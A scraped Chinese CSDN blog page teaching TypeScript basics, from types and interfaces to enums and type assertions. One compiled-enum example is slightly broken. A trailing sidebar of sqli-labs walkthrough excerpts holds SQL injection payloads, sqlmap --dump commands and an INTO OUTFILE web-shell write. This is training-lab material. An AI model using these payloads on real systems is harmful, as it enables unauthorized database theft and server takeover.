【TypeScript】只需半天教会你用ts(基础篇)

最新推荐文章于 2024-08-22 19:11:57 发布
最新推荐文章于 2024-08-22 19:11:57 发布
阅读量715 收藏 3
点赞数 1
文章标签: typescript javascript 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_67745264/article/details/125685828
版权

(多多少少有些标题党啦~)

什么是typescript

● TypeScript 是微软开发的开源编程语言, Type + JavaScript(type是类型 => 在 JS 基础之上,为 JS 添加了类型支持)
● 简称:TS,是 JavaScript 的超集

为什么要有typescript

背景:JS 的类型系统存在“先天缺陷”弱类型,JS 代码中绝大部分错误都是类型错误(Uncaught TypeError)类型错误的例子: var num = 18; num.toLowerCase();
这些经常出现的错误,导致了在使用 JS 进行项目开发时,增加了找 Bug、改 Bug 的时间,严重影响开发效率。
为什么会这样?

● 从编程语言的动静来区分,TypeScript 属于静态类型的编程语言,JavaScript 属于动态类型的编程语言
○ 静态类型:编译期做类型检查
○ 动态类型:执行期做类型检查
● 代码编译和代码执行的顺序:1 编译 2 执行
● 对于 JS 来说:需要等到代码真正去执行的时候才能发现错误(晚)
● 对于 TS 来说:在代码编译的时候(代码执行前)就可以发现错误(早)
并且,配合 VSCode 等开发工具,TS 可以提前到在编写代码的同时就发现代码中的错误,减少找 Bug、改 Bug 时间

Vue 3 源码使用 TS 重写、Angular 默认支持 TS、React 与 TS 完美配合,TypeScript 已成为大中型前端 项目的首选编程语言

目前,前端最新的开发技术栈:

  1. React: TS + Hooks
  2. Vue: TS + Vue3
    ○ 注意: Vue2 对 TS 的支持不好~

安装编译 TS 的工具包

● 问题:为什么要安装编译 TS 的工具包?
● 回答:Node.js(或者是浏览器),只认识 JS 代码,不认识 TS 代码。需要先将 TS 代码转化为 JS 代码,然后才能运行
● 安装命令:npm i -g typescript 或者 yarn global add typescript
○ typescript 包:用来编译 TS 代码的包,提供了 tsc 命令,实现了 TS -> JS 的转化
○ 注意:Mac 电脑安装全局包时,需要添加 sudo 获取权限:sudo npm i -g typescript yarn 全局安装:sudo yarn global add typescript
● 验证是否安装成功:tsc –v(查看 typescript 的版本)

编译并运行 TS 代码

内容:

  1. 创建 hello.ts 文件(注意:TS 文件的后缀名为 .ts)
  2. 将 TS 编译为 JS:在终端中输入命令,tsc hello.ts(此时,在同级目录中会出现一个同名的 JS 文件)
  3. 执行 JS 代码:
    a. 在终端中输入命令,node hello.js
    b. 把hello.js引入某个html文件来运行

1 创建 ts 文件 ===> 2 编译 TS ===> 3 执行 JS

● 说明:所有合法的 JS 代码都是 TS 代码,有 JS 基础只需要学习 TS 的类型即可
● 注意:由 TS 编译生成的 JS 文件,代码中就没有类型信息了

注意:
真正在开发过程中,其实不需要自己手动的通过tsc把ts文件转成js文件,这些工作应该交给webpack或者vite来完成

类型注解(重点)

TypeScript 类型系统的主要优势:可以显示标记出代码中的意外行为,从而降低了发生错误的可能性

let  num1 = 100

let num2: number = 100

● 说明:代码中的 : number 就是类型注解
● 作用:为变量添加类型约束。比如,上述代码中,约定变量 num 的类型为 number 类型
● 解释:约定了什么类型,就只能给变量赋值该类型的值,否则,就会报错
● 约定了类型之后,代码的提示就会非常的清晰

TypeScript类型概述

可以将 TS 中的常用基础类型细分为两类:

● JS 已有类型
○ 原始类型,简单类型(number/string/boolean/null/undefined)
○ 复杂数据类型(数组,对象,函数等)
● TS 新增类型
○ 联合类型
○ 自定义类型(类型别名)
○ 接口
○ 元组
○ 字面量类型
○ 枚举
○ void
○ …

类型推论

在 TS 中,某些没有明确指出类型的地方,TS 的类型推论机制会帮助提供类型 换句话说:由于类型推论的存在,有些场合下的类型注解可以省略不写

发生类型推论的 2 种常见场景:

  1. 声明变量并初始化时
  2. 决定函数返回值时
// 变量 num 的类型被自动推断为:number
let num = 18

// 函数返回值的类型被自动推断为:number
function fn(num1: number, num2: number): number {
  return num1 + num2
}

数组类型

数组类型的两种写法:

// 写法一: 类型[]
let arr1: number[] = [1, 3, 5]

// 写法二:Array<类型>
let arr2: Array<string> = ['a', 'b', 'c']

联合类型

let arr: (number | string)[] = [1, 'a', 3, 'b']

解释:|(竖线)在 TS 中叫做联合类型,即:由两个或多个其他类型组成的类型,表示可以是这些类型中的任意一种

类型别名-type(重要)

格式
定义type 别名 = 类型

type S = string // 定义  

const str1:S = 'abc'

const str2:string = 'abc'

作用

  1. 给类型起别名
  2. 定义了新类型
    别名可以是任意的合法字符串,一般首字母大写

函数-单个定义

函数的类型实际上指的是:函数形参和返回值的类型

// 普通函数 
function 函数名(形参1: 类型=默认值, 形参2:类型=默认值): 返回值类型 { }  
// 箭头函数 
const 函数名(形参1: 类型=默认值, 形参2:类型=默认值):返回值类型 => { }

函数-统一定义函数格式

type Fn = (n1:number,n2:number)=>number  

const add1 : Fn = (a,b)=>{return a+b }

函数返回值是void

如果函数没有返回值,那么,函数返回值类型为:void

如果一个函数没有返回值,此时,在 TS 的类型中,应该使用 void 类型,有如下三种情况会满足
● 不写return
● 写return ,但是后面不接内容
● 写return undefined

// 如果什么都不写,此时,add 函数的返回值类型为: void
const add = () => {}
// 这种写法是明确指定函数返回值类型为 void,与上面不指定返回值类型相同
const add = (): void => {}

// 但,如果指定 返回值类型为 undefined,此时,函数体中必须显示的 return undefined 才可以
const add = (): undefined => {
  // 此处,返回的 undefined 是 JS 中的一个值
  return undefined
}

函数-可选参数

格式
可选参数:在可选参数名的后面添加 ?(问号)

function mySlice(start?: number, end?: number): void {
  console.log('起始索引:', start, '结束索引:', end)
}

可选和默认值的区别
相同点: 调用函数时,可以少传参数
区别:设置了默认值之后,就是可选的了,不写就会使用默认值; 可选的并一定有值。
注意:它们不能一起使用。优先使用默认值

对象类型

对象类型的写法:

// 有属性的对象
let person: { name: string } = {
  name: '同学'
}

// 既有属性又有方法的对象
// 在一行代码中指定对象的多个属性类型时,使用 `;`(分号)来分隔
let person: { name: string; sayHi(): void } = {
  name: 'jack',
  sayHi() {}
}

// 对象中如果有多个类型,可以换行写:
// 通过换行来分隔多个属性类型,可以去掉 `;`
let person: {
  name: string
  sayHi(): void
} = {
  name: 'jack',
  sayHi() {}
}

● 解释:

  1. 使用 {} 来描述对象结构
  2. 属性采用属性名: 类型的形式
  3. 方法采用方法名(): 返回值类型的形式

使用类型别名

● 注意:直接使用 {} 形式为对象添加类型,会降低代码的可读性(不好辨识类型和值)
● 推荐:使用类型别名为对象添加类型

// 创建类型别名
type Person = {
  name: string
  sayHi(): void
}

// 使用类型别名作为对象的类型:
let person: Person = {
  name: 'jack',
  sayHi() {}
}

箭头函数形式的方法类型

方法的类型也可以使用箭头函数形式

{
    greet(name: string):string,
    greet: (name: string) => string
}



type Person = {
  greet: (name: string) => void
  greet(name: string):void
}

let person: Person = {
  greet(name) {
    console.log(name)
  }
}

对象可选属性

对象的属性或方法,也可以是可选的,此时就用到可选属性了
比如,我们在使用 axios({ … }) 时,如果发送 GET 请求,method 属性就可以省略

可选属性的语法与函数可选参数的语法一致,都使用 ? 来表示

type Config = {
  url: string
  method?: string
}

function myAxios(config: Config) {
  console.log(config)
}

接口类型

当一个对象类型被多次使用时,一般会使用接口(interface)来描述对象的类型,达到复用的目的

● 解释:
a. 使用 interface 关键字来声明接口
b. 接口名称(比如,此处的 IPerson),可以是任意合法的变量名称,推荐以 I 开头
c. 声明接口后,直接使用接口名称作为变量的类型
d. 因为每一行只有一个属性类型,因此,属性类型后没有 ;(分号)

interface IPerson {
  name: string
  age: number
  sayHi(): void
}


let person: IPerson = {
  name: 'jack',
  age: 19,
  sayHi() {}
}

interface vs type !

● interface(接口)和 type(类型别名)的对比:
● 相同点:都可以给对象指定类型
● 不同点:
1.接口,只能为对象指定类型
2. 类型别名,不仅可以为对象指定类型,实际上可以为任意类型指定别名
● 推荐:能使用 type 就是用 type

interface IPerson {
  name: string
  age: number
  sayHi(): void
}

// 为对象类型创建类型别名
type IPerson = {
  name: string
  age: number
  sayHi(): void
}

// 为联合类型创建类型别名
type NumStr = number | string

接口继承

● 如果两个接口之间有相同的属性或方法,可以将公共的属性或方法抽离出来,通过继承来实现复用
● 比如,这两个接口都有 x、y 两个属性,重复写两次,可以,但很繁琐

interface IPoint2D { x: number; y: number }
interface IPoint3D { x: number; y: number; z: number }

更好的方式:

interface IPoint2D { x: number; y: number }
// 继承 Point2D
interface IPoint3D extends IPoint2D {
  z: number
}

● 解释:
a. 使用 extends(继承)关键字实现了接口 IPoint3D 继承 IPoint2D
b. 继承后,IPoint3D 就有了 IPoint2D 的所有属性和方法(此时,IPoint3D 同时有 x、y、z 三个属性)

元组类型

● 使用 number[] 的缺点:不严谨,因为该类型的数组中可以出现任意多个数字
● 更好的方式:元组 Tuple
● 元组类型是另一种类型的数组,它确切地知道包含多少个元素,以及特定索引对应的类型

let position: [number, number] = [39.5427, 116.2317]

● 解释:
a. 元组类型可以确切地标记出有多少个元素,以及每个元素的类型
b. 该示例中,元素有两个元素,每个元素的类型都是 number

字面量类型

思考以下代码,两个变量的类型分别是什么?

let str1 = 'Hello TS'
const str2 = 'Hello TS'

● 通过 TS 类型推论机制,可以得到答案:
a. 变量 str1 的类型为:string
b. 变量 str2 的类型为:‘Hello TS’
● 解释:

  1. str1 是一个变量(let),它的值可以是任意字符串,所以类型为:string
  2. str2 是一个常量(const),它的值不能变化只能是 ‘Hello TS’,所以,它的类型为:‘Hello TS’

● 注意:此处的 ‘Hello TS’,就是一个字面量类型,也就是说某个特定的字符串也可以作为 TS 中的类型
● 任意的 JS 字面量(比如,对象、数字等)都可以作为类型使用
○ 字面量:{ name: ‘jack’ } [] 18 20 ‘abc’ false function() {}

枚举类型

● 枚举的功能类似于字面量类型+联合类型组合的功能,也可以表示一组明确的可选值
● 枚举:定义一组命名常量。它描述一个值,该值可以是这些命名常量中的一个

// 创建枚举
enum Direction { Up, Down, Left, Right }

// 使用枚举类型
function changeDirection(direction: Direction) {
  console.log(direction)
}

// 调用函数时,需要应该传入:枚举 Direction 成员的任意一个
// 类似于 JS 中的对象,直接通过 点(.)语法 访问枚举的成员
changeDirection(Direction.Up)

● 解释:
a. 使用 enum 关键字定义枚举
b. 约定枚举名称以大写字母开头
c. 枚举中的多个值之间通过 ,(逗号)分隔
d. 定义好枚举后,直接使用枚举名称作为类型注解

数字枚举

● 问题:我们把枚举成员作为了函数的实参,它的值是什么呢?
● 解释:通过将鼠标移入 Direction.Up,可以看到枚举成员 Up 的值为 0
● 注意:枚举成员是有值的,默认为:从 0 开始自增的数值
● 我们把,枚举成员的值为数字的枚举,称为:数字枚举
● 当然,也可以给枚举中的成员初始化值

// Down -> 11、Left -> 12、Right -> 13
enum Direction { Up = 10, Down, Left, Right }

enum Direction { Up = 2, Down = 4, Left = 8, Right = 16 }

字符串枚举

● 字符串枚举:枚举成员的值是字符串
● 注意:字符串枚举没有自增长行为,因此,字符串枚举的每个成员必须有初始值

enum Direction {
  Up = 'UP',
  Down = 'DOWN',
  Left = 'LEFT',
  Right = 'RIGHT'
}

枚举实现原理

● 枚举是 TS 为数不多的非 JavaScript 类型级扩展(不仅仅是类型)的特性之一
● 因为:其他类型仅仅被当做类型,而枚举不仅用作类型,还提供值(枚举成员都是有值的)
● 也就是说,其他的类型会在编译为 JS 代码时自动移除。但是,枚举类型会被编译为 JS 代码

enum Direction {
  Up = 'UP',
  Down = 'DOWN',
  Left = 'LEFT',
  Right = 'RIGHT'
}

// 会被编译为以下 JS 代码:
var Direction;

(function (Direction) {
  Direction['Up'] = 'UP'
  Direction['Down'] = 'DOWN'
  Direction['Left'] = 'LEFT'
  Direction['Right'] = 'RIGHT'
})(Direction || Direction = {})

● 说明:枚举与前面讲到的字面量类型+联合类型组合的功能类似,都用来表示一组明确的可选值列表
● 一般情况下,推荐使用字面量类型+联合类型组合的方式,因为相比枚举,这种方式更加直观、简洁、高效

any 类型

● 原则:不推荐使用 any!这会让 TypeScript 变为 “AnyScript”(失去 TS 类型保护的优势)
● 因为当值的类型为 any 时,可以对该值进行任意操作,并且不会有代码提示

let obj: any = { x: 0 }

obj.bar = 100
obj()
const n: number = obj

解释:
● 以上操作都不会有任何类型错误提示,即使可能存在错误
● 尽可能的避免使用 any 类型,除非临时使用 any 来“避免”书写很长、很复杂的类型
● 其他隐式具有 any 类型的情况
a. 声明变量不提供类型也不提供默认值
b. 函数参数不加类型
● 注意:因为不推荐使用 any,所以,这两种情况下都应该提供类型

类型断言

有时候你会比 TS 更加明确一个值的类型,此时,可以使用类型断言来指定更具体的类型。 比如

const aLink = document.getElementById('link')

● 注意:该方法返回值的类型是 HTMLElement,该类型只包含所有标签公共的属性或方法,不包含 a 标签特有的 href 等属性
● 因此,这个类型太宽泛(不具体),无法操作 href 等 a 标签特有的属性或方法
● 解决方式:这种情况下就需要使用类型断言指定更加具体的类型
● 使用类型断言:

const aLink = document.getElementById('link') as HTMLAnchorElement

● 解释:
a. 使用 as 关键字实现类型断言
b. 关键字 as 后面的类型是一个更加具体的类型(HTMLAnchorElement 是 HTMLElement 的子类型)
c. 通过类型断言,aLink 的类型变得更加具体,这样就可以访问 a 标签特有的属性或方法了

另一种语法,使用 <> 语法,这种语法形式不常用,知道即可:

// 该语法,知道即可:
const aLink = <HTMLAnchorElement>document.getElementById('link')
sqlilabs通关()
Forrest_bear的博客
05-24 2590
就像以下代码一样:隔离空格。
Sqli-lab教程-史上最全详解(1-22通关
qq_52364123的博客
04-10 1万+
sql注入集合
SQLi-LABS通关攻略【21-25关】
qq_65852138的博客
08-22 453
SQLi-LABS通关攻略【21-25关】
sqli-labs通关攻略(全关卡)(更新中~)
C233333235的博客
07-22 1642
7.然后就要进行表名的查询,此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询,group_concat的作用是将查询出的表名显示到一行,不然只能显示第一个表名。(别忘了在参数1前面加-,主要是为了使参数变为一个不存在的参数,任何过大的数字或负数,以及小数,科学计数法数字都可以),在这里确定其回显位置为2和3。1.打开关卡,提示我们将参数id填入url中。
Sqli-labs通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
Sqli-labs通关手册1-30关】
李安北的博客
05-03 7551
1.sql注入的原理 1)sql注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 例如:在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。 2)登录案例讲解 主要是万能密码:登录SQL语句:select * from admin where username = ‘用户输入的用户名’
sqli-labs靶场通关攻略
test_zpx的博客
08-14 4028
Good Good Study,Day Day Up!
sql-labs通关讲解
qq_70836100的博客
07-22 1637
目录。
详细sqli-labs1-20)通关讲解
m0_57928318的博客
05-18 6522
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli-labs通关详解
m0_52051132的博客
10-15 7326
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs通关记录
qq_39670065的博客
07-11 2991
sqli-lab通关记录 1.docker搭建 运行:docker info //查看docker信息,确认docker正常 搜索sqli-labs:docker search sqli-labs 建立镜像:docker pull acgpiano/sqli-labs 查看存在的镜像:docker images 运行存在的镜像:docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (参数解释:-dt 后台运行; --name 命名
sqli-labs通关攻略
jhfjdf的博客
10-13 1500
sqli-labsless 1 less 1 字符型注入,单引号 网址后面接 ?id=1 正常显示,然后判断注入点 ?id=1' and 1=1--+ 将1=1换成1=2,发现没有报错,但不显示信息,说明可以使用字符注入 之后判断列数,使用order by,从1开始逐渐递增,报错时停止。 ?id=1' order by 1--+ ...
sql—labs通关
m0_64674174的博客
10-24 783
主界面由于mysql_real_escape_string的过滤,将单引号,双引号等进行转义,无法进行注入,注册界面以及修改密码界面,由于注册界面以及修改密码见面的闭合方式不一样,可以达到二次注入的目的,创建。安装方法:解压到小皮面板的www的目录下,在sqllabs的sql-connections目录下的db-creds.inc文件,下图划横线位置设置自己的密码即可,从代码角度而言,可以很清楚的看出由单引号闭合,直接使用sql注入的一半流程即可,查询字段,判断回显,数据库——表——列,即可 为。
sqli-labs 通关日志 萌新向
春日野穹
11-16 2124
0x0 引言 sqli-labs是一个用来练习sql注入的平台,其内置集成了现存的各种sql注入,如盲注,联合查询注入等,对于新手来说它是一个十分不错的练习平台,我们可以使用它来进行各种注入尝试,从而提升我们的sql注入能力 萌新建议先看这个帖子再来做题:https://blog.youkuaiyun.com/chest_/article/details/102537988 目录快速导航 环境的搭...
sqli-labs通关大全(更新至Less60)
热门推荐
箭雨镜屋
09-03 2万+
sqli-labs通关(less1~less10)_箭雨镜屋-优快云博客 sqli-labs通关(less11~less20)_箭雨镜屋-优快云博客 sqli-labs通关(less21~less30)_箭雨镜屋-优快云博客
sqli-labs通关教程
m0_65150886的博客
01-23 1900
id=1返回正常页面?id=1'显示sql语句有误?id=1''页面返回正常,证明是字符型注入。因为该页面存在回显,所以我们可以使用联合查询。
sqli-labs通关详解(1-20关)
2302_81105681的博客
04-11 3583
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6关,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 3247
sqli-labs-master[超详细通关教程,通关攻略~!](附解题思路及各注入方法解析)-------持续更新关卡通关教程!!!!
SQLi_Labs通关文档【1-65关】
weixin_30491641的博客
07-23 803
SQLi_Labs通关文档【1-65关】 为了不干扰自己本机环境,SQL-LAB我就用的码头工人,跑起来的,搭建也非常简单,也就两条命令 dockerpullacgpiano/sqli-labsdockerrun-dt--namesqli-lab-p[你要映射的端口]:80acgpiano/sqli-labs:latest 然后在SQL-LAB上直接初始化数...
sqli-labs1-7通关
最新发布
01-01
### SQLi-Labs 1-7 关卡解题思路 #### Less-1: 基础 GET 请求注入 在这一关中,目标是在 URL 参数 `id` 中注入 SQL 语句来获取数据库中的信息。通过输入 `' OR '1'='1` 可以绕过身份验证并登录成功[^1]。 ```sql ?id=1' or '1'='1 ``` #### Less-2: 使用 UNION SELECT 注入 此关涉及使用 `UNION SELECT` 来联合查询其他表的内容。为了找到合适的列数,可以逐个增加返回的结果集数量直到页面不再报错为止。一旦确定了正确的列数,则可以通过这些列读取任意表格的信息[^3]。 ```sql ?id=-1 UNION ALL SELECT NULL,NULL FROM information_schema.tables WHERE table_schema=database()# ``` #### Less-3: 报错注入 利用 MySQL 的内置函数如 `extractvalue()` 或者 `updatexml()` 实现基于错误回显的 SQL 注入攻击。这允许直接从服务器响应中提取敏感数据而无需额外请求。 ```sql ?uname=1' AND extractvalue(1,concat(0x7e,(SELECT database())))--+&passwd=1&submit=Submit ``` #### Less-4: 时间盲注 当无法看到具体的错误消息时,可采用时间延迟技术来进行推测性的注入测试。例如,如果存在漏洞则会使查询等待一段时间再继续执行。 ```sql ?id=1' AND IF(SUBSTRING(@@version,1,1)=5,SLEEP(5),NULL)--+ ``` #### Less-5: 基于布尔条件的时间盲注 进一步扩展上一关的概念,在不知道确切版本号的情况下也可以利用布尔表达式的真假判断配合 SLEEP 函数完成注入操作[^2]。 ```sql ?id=1' AND (IF((ASCII(SUBSTRING(version(),1,1)))>50,BENCHMARK(5000000,SHA1('A')),false))--+ ``` #### Less-6: 多参数注入 本关考察如何处理多个输入字段的同时注入问题。通常情况下只需要在一个地方构造恶意负载即可影响整个查询逻辑[^4]。 ```sql ?id=-1' UNION SELECT 1,GROUP_CONCAT(username,0x7E,password) FROM users # ``` #### Less-7: 文件写入与读取 最后一关涉及到更高级别的功能——将查询结果保存成文件并通过 Web 访问路径下载下来查看具体内容。这一步骤可能需要用到 INTO OUTFILE 子句以及 LOAD_FILE() 函数实现本地文件系统的交互。 ```sql ?id=1' union all select null,'<?php phpinfo(); ?>' into outfile '/var/www/html/shell.php'# ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值